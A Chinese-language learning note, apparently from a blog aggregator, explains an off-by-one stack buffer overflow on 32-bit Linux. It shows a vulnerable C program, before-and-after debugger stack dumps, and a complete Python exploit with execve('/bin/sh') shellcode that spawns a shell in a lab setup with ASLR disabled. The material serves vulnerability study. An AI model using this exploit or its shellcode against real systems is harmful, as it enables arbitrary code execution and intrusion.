2. 程式人生 > >Linux漏洞分析入門筆記-Off-By-One(棧)

Linux漏洞分析入門筆記-Off-By-One(棧)

阿新 發佈:2019-01-09

ubuntu-16.04.5(X86)

IDA7.0

0x00.漏洞描述

1.什麼是off by one?又稱1位元組溢位。

源字串長度等於目標緩衝區長度時,將源字串複製到目標緩衝區可能會導致off by one。

當源字串長度等於目標緩衝區長度時,NULL位元組將被複制到目標緩衝區上方。這裡由於目標緩衝區位於堆疊中,所以單個NULL位元組可以覆蓋儲存在堆疊中的呼叫者的EBP的最低位(1位元組),這可能導致任意的程式碼執行。

0x01.漏洞分析

1.示例程式碼:

 1 #include <stdio.h>
 2 #include <string.h>
 3 void
 
 foo(char* arg);
 4 void bar(char* arg);
 5 void foo(char* arg) {
 6 bar(arg); /* [1] */
 7 }
 8 void bar(char* arg) {
 9 char buf[256];
10 strcpy(buf, arg); /* [2] */
11 }
12 int main(int argc, char *argv[]) {
13 if(strlen(argv[1])>256) { /* [3] */
14 printf("Attempted Buffer Overflow\n");
15 fflush(stdout);

 
16 return -1;
17 }
18 foo(argv[1]); /* [4] */
19 return 0;
20 }

編譯生成目標檔案:

gcc -fno-stack-protector -z execstack -mpreferred-stack-boundary=2 -o vuln vuln.c

上述示例程式碼的第[2]行是可能發生off by one溢位的地方。目標緩衝區長度為256,因此長度為256位元組的源字串可能導致任意程式碼執行。

2.如何產生任意程式碼執行?動態除錯,如下圖1所示,拷貝字串前棧情況。

          圖1

如果呼叫foo者的EBP位於目標緩衝區之上,則在strcpy之後,單個NULL(0x00)位元組將覆蓋呼叫者EBP的最後一個位元組,如圖2所示。

          圖2

構造poc

//偏移

0xBFFFEF00-0xBFFFEE58+0x4=0xAC

python -c "print 'A' * 172 + 'B' * 4 + 'C' * 80"

執行strcpy之後,儲存在目標緩衝區buf之上的EBP被一個NULL(0x00)位元組所覆蓋,ebp從0xBFFFEF64變為0xBFFFEF00(可對比圖1圖2)。從偵錯程式堆疊佈局我們可以看到堆疊位置0xBFFFEF00是目標緩衝區buf的一部分。

//拷貝前棧
BFFFEE58  F63D4E2E  
BFFFEE5C  B7E0CF12  libc_2.23.so:B7E0C
BFFFEE60  000008EA  
BFFFEE64  B7E16618  libc_2.23.so:B7E16
BFFFEE68  B7E15DC8  libc_2.23.so:B7E15
BFFFEE6C  07B1EA71  
BFFFEE70  B7FF7AC4  ld_2.23.so:__get_c
BFFFEE74  BFFFEF20  [stack]:BFFFEF20
BFFFEE78  B7FF59F3  ld_2.23.so:__get_c
BFFFEE7C  B7FD5470  debug003:B7FD5470
BFFFEE80  00000000  
BFFFEE84  00000000  
BFFFEE88  B7FFF000  ld_2.23.so:B7FFF00
BFFFEE8C  B7FFFC08  ld_2.23.so:_r_debu
BFFFEE90  00000000  
BFFFEE94  00000000  
BFFFEE98  00000000  
BFFFEE9C  BFFFEF2C  [stack]:BFFFEF2C
BFFFEEA0  B7FE3FC9  ld_2.23.so:_dl_rtl
BFFFEEA4  00000000  
BFFFEEA8  B7FFFAD0  ld_2.23.so:_r_debu
BFFFEEAC  BFFFEF28  [stack]:BFFFEF28
BFFFEEB0  BFFFEF70  [stack]:BFFFEF70
BFFFEEB4  B7FE4B4B  ld_2.23.so:_dl_rtl
BFFFEEB8  08048220  LOAD:08048220
BFFFEEBC  BFFFEF28  [stack]:BFFFEF28
BFFFEEC0  B7FFFA74  ld_2.23.so:_r_debu
BFFFEEC4  00000001  
BFFFEEC8  B7FD54A0  debug003:B7FD54A0
BFFFEECC  00000001  
BFFFEED0  00000000  
BFFFEED4  00000001  
BFFFEED8  B7FFF918  ld_2.23.so:_r_debu
BFFFEEDC  00F0B5FF  
BFFFEEE0  BFFFEF1E  [stack]:BFFFEF1E
BFFFEEE4  00000001  
BFFFEEE8  000000C2  
BFFFEEEC  B7E996BB  libc_2.23.so:strer
BFFFEEF0  BFFFEF1E  [stack]:BFFFEF1E
BFFFEEF4  BFFFF020  [stack]:BFFFF020
BFFFEEF8  000000E0  
BFFFEEFC  00000000  
BFFFEF00  B7FFF000  ld_2.23.so:B7FFF00
BFFFEF04  B7FFF918  ld_2.23.so:_r_debu
BFFFEF08  BFFFEF20  [stack]:BFFFEF20
BFFFEF0C  08048293  LOAD:aLibcStartMai
BFFFEF10  00000000  
BFFFEF14  BFFFEFB4  [stack]:BFFFEFB4
BFFFEF18  B7FBB000  libc_2.23.so:B7FBB
BFFFEF1C  0000FF17  
BFFFEF20  FFFFFFFF  
BFFFEF24  0000002F  
BFFFEF28  B7E15DC8  libc_2.23.so:B7E15
BFFFEF2C  B7FD51B0  debug003:B7FD51B0
BFFFEF30  00008000  
BFFFEF34  08049FF4  .got.plt:_GLOBAL_O
BFFFEF38  00000002  
BFFFEF3C  08048341  _init_proc+29
BFFFEF40  00000002  
BFFFEF44  00000000  
BFFFEF48  08049FF4  .got.plt:_GLOBAL_O
BFFFEF4C  08048531  __libc_csu_init+21
BFFFEF50  B7FBB000  libc_2.23.so:B7FBB
BFFFEF54  B7FBB000  libc_2.23.so:B7FBB
BFFFEF58  BFFFEF64  [stack]:BFFFEF64
BFFFEF5C  08048475  foo+11
BFFFEF60  BFFFF20D  [stack]:BFFFF20D
BFFFEF64  BFFFEF78  [stack]:BFFFEF78
BFFFEF68  080484F9  main+62
BFFFEF6C  BFFFF20D  [stack]:BFFFF20D
//拷貝後棧
BFFFEE58  41414141  
BFFFEE5C  41414141  
BFFFEE60  41414141  
BFFFEE64  41414141  
BFFFEE68  41414141  
BFFFEE6C  41414141  
BFFFEE70  41414141  
BFFFEE74  41414141  
BFFFEE78  41414141  
BFFFEE7C  41414141  
BFFFEE80  41414141  
BFFFEE84  41414141  
BFFFEE88  41414141  
BFFFEE8C  41414141  
BFFFEE90  41414141  
BFFFEE94  41414141  
BFFFEE98  41414141  
BFFFEE9C  41414141  
BFFFEEA0  41414141  
BFFFEEA4  41414141  
BFFFEEA8  41414141  
BFFFEEAC  41414141  
BFFFEEB0  41414141  
BFFFEEB4  41414141  
BFFFEEB8  41414141  
BFFFEEBC  41414141  
BFFFEEC0  41414141  
BFFFEEC4  41414141  
BFFFEEC8  41414141  
BFFFEECC  41414141  
BFFFEED0  41414141  
BFFFEED4  41414141  
BFFFEED8  41414141  
BFFFEEDC  41414141  
BFFFEEE0  41414141  
BFFFEEE4  41414141  
BFFFEEE8  41414141  
BFFFEEEC  41414141  
BFFFEEF0  41414141  
BFFFEEF4  41414141  
BFFFEEF8  41414141  
BFFFEEFC  41414141  
BFFFEF00  41414141  
BFFFEF04  42424242  
BFFFEF08  43434343  
BFFFEF0C  43434343  
BFFFEF10  43434343  
BFFFEF14  43434343  
BFFFEF18  43434343  
BFFFEF1C  43434343  
BFFFEF20  43434343  
BFFFEF24  43434343  
BFFFEF28  43434343  
BFFFEF2C  43434343  
BFFFEF30  43434343  
BFFFEF34  43434343  
BFFFEF38  43434343  
BFFFEF3C  43434343  
BFFFEF40  43434343  
BFFFEF44  43434343  
BFFFEF48  43434343  
BFFFEF4C  43434343  
BFFFEF50  43434343  
BFFFEF54  43434343  
BFFFEF58  BFFFEF00  [stack]:BFFFEF00
BFFFEF5C  08048475  foo+11
BFFFEF60  BFFFF20D  [stack]:BFFFF20D
BFFFEF64  BFFFEF78  [stack]:BFFFEF78
BFFFEF68  080484F9  main+62
BFFFEF6C  BFFFF20D  [stack]:BFFFF20D

3.根據棧回溯,可以控制這個堆疊位置(0xBFFFEF00),因此他控制指令指標(eip )使用他可以實現任意程式碼執行,如圖3圖4。

          圖3

          圖4

leave指令相當執行了兩條指令 mov ebp, esp; pop ebp,而EPB後面剛好是函式返回地址,再執行ret指令時EIP就指向了攻擊者可以控制返回地址。

4.Poc編寫獲取shell

 1 #!/usr/bin/env python
 2 import struct
 3 from subprocess import call
 4 #execve(/bin/sh)
 5 shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\x90\x90\x90"
 6 ret_addr = 0xBFFFEF18
 7 def conv(num):
 8 return struct.pack("<I",num)
 9 buf = "A" * 172
10 buf += conv(ret_addr)
11 buf += "\x90" * 30
12 buf += shellcode
13 buf += "\x90" * 22
14 print "Calling  program"
15 call(["./vuln", buf])

          圖5

圖5所示,成功獲取shell。

0x02.總結

1.如果堆疊是隨機的就不能成功利用,每次大小都是不一樣的,很難固定shellcode的位置,所以關閉了ASLR。還有就是被溢位的地址必須得是buf的地址才能有機會成功。

相關推薦

Linux漏洞分析入門筆記-Off-By-One()

ubuntu-16.04.5(X86) IDA7.0 0x00.漏洞描述 1.什麼是off by one?又稱1位元組溢位。 源字串長度等於目標緩衝區長度時,將源字串複製到目標緩衝區可能會導致off by one。 當源字串長度等於目標緩衝區長度時,NULL位元組將被複制到目標緩衝區上方。這裡由於目

linux漏洞分析入門筆記-溢位

ida7.0 ubuntu16.04 lts 0x00:環境配置 使用IDA遠端除錯Linux程式步驟如下: 1. 在進行遠端除錯之前需要對Linux平臺進行一些準備工作。在IDA的安裝目錄中的dbgsrv資料夾中,選擇linux_server或者linux_serverx64複製到需要除錯Linux

linux漏洞分析入門筆記-bypass_PIE

recv bre 代碼 src pytho ace 測試 send pad ubuntu 16.04 IDA 7.0 docker 0x00:漏洞分析 1.ASLR的是操作系統的功能選項,作用於executable(ELF)裝入內存運行時,因而只能隨機化stack、heap

Linux漏洞分析入門筆記-CVE-2015-0235

Ubuntu 12.04 32位 ida 7.0 0x00:漏洞描述 1.glibc的__nss_hostname_digits_dots存在緩衝區溢位漏洞,導致使用gethostbyname系列函式的某些軟體存在程式碼執行或者資訊洩露的安全風險。 通過gethostbyname()函式或gethos

Linux (x86) Exploit系列之三 Off-By-One 漏洞 (基於)

也有 diy ubun bin 漏洞 cal cst nbsp process Off-By-One 漏洞 (基於棧) 原文地址:https://bbs.pediy.com/thread-216954.htm 什麽是off by one? 將源字符串復制到目標緩沖區可能會導

Linux (x86) Exploit 開發系列教程之三(Off-By-One 漏洞 (基於))

字符串長度 教程 緩沖 實現 長度 溢出 att 測試 div (1)原理: 將源字符串復制到目標緩沖區可能會導致off by one。當源字符串長度等於目標緩沖區長度時,單個NULL字節將被復制到目標緩沖區上方。這裏由於目標緩沖區位於堆棧中,所以單個NULL字節可以覆蓋

0ctf2018-babyheap除錯記錄fastbin-attack,off-by-one

    檢視檔案格式以及保護開啟情況。發現為64位程式,符號被剝離,動態連結程式且題目提供給了libc。保護全開,猜想可能是fast attack加上malloc_hook利用(畢竟去年這題是這個利用,肯定先往這邊想)     簡單的執行程式,發現是常規的選單

堆溢位----Off-By-One

學習資料:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/heap/off_by_one/#_5 off-by-one 指程式向緩衝區中寫入時,寫入的位元組數超過了這個緩衝區本身所申請的位元組數並且只越界了一個位元組,emmm 看一下CTFWIKI

python數據分析入門學習筆記

rip help cat app run 復雜 bsp 真的 parser 學習利用python進行數據分析的筆記兒&下星期二內部交流會要講的內容,一並分享給大家。博主粗心大意,有什麽不對的地方歡迎指正~還有許多尚待完善的地方,待我一邊學習一邊完善~ 前言:各種和

Linux入門筆記3

持續更新一、管理權限和歸屬1.權限概述文檔歸屬所有者(u):擁有此文件/目錄的用戶-user所屬組(g):擁有此文件/目錄的組-group其他用戶(o):除所有者、所屬組以外的用戶-other訪問權限讀取(r):允許查看內容-read寫入(w):允許修改內容-write可執行(x):允許運行和切換-excut

Linux學習從入門到打死也不放棄,完全筆記整理(持續更新)

linux 運維 學習筆記 這是一片學習筆記的匯總,查看內容請點擊各章節介紹。 第一章,計算機基礎和linux基本介紹 http://blog.51cto.com/13683480/2095433 第二章,linux基礎 http://blog.51

斯坦福大學-自然語言處理入門 筆記 第十六課 依存句法分析(Dependency Parsing)

一、介紹 1、依存句法 依存句法假設:句法結構包含相互之間是雙邊不對稱關係的詞典(lexical)元素,這種不對稱的關係成為依存(dependency),在圖中的表現是單向箭頭。 箭頭通常還會打上這種語法關係的名字(主語,前置賓語等等) 箭頭一邊連線中心詞head

斯坦福大學-自然語言處理入門 筆記 第十三課 統計語言句法分析(prasing)

課程來源:Introduction to NLP by Chris Manning & Dan jurafsky 關於專用名詞和概念:剛接觸NLP領域,所以有些專有名詞的翻譯和專有概念可能會存在一定的偏誤,隨著學習的深入,我會隨時更新改正。 一、關於句法結構的兩種看法

斯坦福大學-自然語言處理入門 筆記 第七課 情感分析(sentiment analysis)

一、情感分析簡述 情感分析(sentiment analysis),又叫意見抽取(opinion extraction),意見挖掘(opinion mining),情感挖掘(sentiment mining)以及主觀分析(subjectivity analysis)。 情感分

演算法導論 第二章:演算法入門 筆記 (插入排序、迴圈不變式、演算法分析、最好和最壞時間複雜度、選擇排序、分治法、合併排序)

插入排序: 排序問題的定義如下: 輸入:N個數{a1, a2,..., an }。 輸出:輸入序列的一個排列{a'1 ,a'1 ,...,a'n },使得a'n <=a' n<=...<

LINUX入門筆記--許可權管理命令--許可權管理命令chmod

chmod 命令名稱:chmod 命令英文原意:change the permissions mode of a file 命令所在路徑/bin/chmod 執行許可權:所有使用者 語法:chmod [{ugoa}{+-=}{rwx}] [檔案或目錄]   &nbs

linux入門筆記

修改密碼 筆記 命令 word gnome face 用戶名 inux nom linux蓄力終端切換(Ctrl+Alt+F1~F6)可以開啟6個終端(每個終端都可以登錄不通用戶)圖形界面(GUI)Gnome 【c開發】KDE 【c++開發】Xface 命令行界面(

LINUX入門筆記--檔案處理命令--檔案處理命令

1.touch 命令名稱:touch 命令所在路徑:/bin/touch 執行許可權:所有使用者 語法:touch [檔名] 功能描述:建立空檔案 範例: 1.touch [檔名],如果在沒有指明絕對路徑的情況下就預設在當前目錄建立該檔案,但是如果指明絕對路徑的話就是在指

Linux入門筆記--檔案處理命令--命令格式與目錄處理命令ls

命令格式 命令格式:命令[-選項][引數]    可以將選項理解為用來調整操作的功能,引數理解為操作的物件,可能是使用者,程序或者檔案   例如: ls -la /etc  說明:①個別命令使用不遵循此規則。選項和命令用中括號括起來說明可有可沒有,

LINUX入門筆記--初學者應該注意的東西

1.學習Linux的注意事項 Linux下嚴格區分大小寫 與Windows不同的是在Windows下DOS命令和檔案命名都不區分大小寫,但在Linux下嚴格區分大小寫。不光命令區分大小寫,檔案命名和選項等等許多地方也嚴格區分大小寫。 Linux是沒有大寫的命令的,全是小寫